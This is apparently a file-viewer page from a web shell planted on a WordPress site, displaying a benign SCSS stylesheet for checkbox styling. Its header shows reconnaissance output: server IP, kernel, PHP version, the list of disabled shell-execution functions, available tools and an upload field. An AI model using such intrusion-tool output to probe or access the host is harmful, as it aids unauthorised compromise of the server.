| Server IP : 47.82.179.145 / Your IP : 216.73.217.129 Web Server : nginx/1.26.3 System : Linux iZt4n9czhka2zvqfajdlr2Z 6.8.0-63-generic #66-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:25:30 UTC 2025 x86_64 User : www ( 1001) PHP Version : 8.3.30 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/scuipturepactory.com/wp-content/themes/plover/assets/scss/elements/ |
Upload File : |
div.wpforms-container-full input[type=checkbox],
input[type="checkbox"] {
appearance: none;
width: 1.2em;
height: 1.2em;
margin: 0.1em 0.5em 0 0;
border-width: var(--wp--custom--elements--checkbox--border-width, var(--wp--custom--border--width, 1px));
border-radius: var(--wp--custom--elements--checkbox--border-radius, var(--wp--custom--border-radius--rounded, inherit));
border-style: var(--wp--custom--elements--checkbox--border-style, var(--wp--custom--border--style, solid));
border-color: var(--wp--custom--elements--checkbox--border-color, var(--wp--custom--border--color, currentColor));
display: inline-grid;
place-content: center;
color: var(--wp--custom--elements--checkbox--color, var(--wp--custom--color--primary, currentColor));
background-color: var(--wp--custom--elements--checkbox--background, transparent);
&:checked::after,
&::after {
display: none;
}
&::before {
content: "";
width: 1em;
height: 1em;
position: static;
border-radius: 0.15em;
transform: scale(0);
clip-path: polygon(22% 44%, 10% 60%, 46% 87%, 92% 30%, 75% 17%, 42% 59%);
transition: var(--wp--custom--transition);
background: var(--wp--custom--color--body, currentColor);
}
&:checked {
background-color: currentColor;
}
&:checked::before {
transform: scale(0.66);
}
&:focus {
border-color: var(--wp--custom--elements--checkbox--focus--border-color, currentColor) !important;
outline: var(--wp--custom--border--width, 1px) solid currentColor;
outline-offset: var(--wp--custom--border--width, 1px);
}
&.checkbox {
margin-right: 0;
~br {
content: '';
}
}
}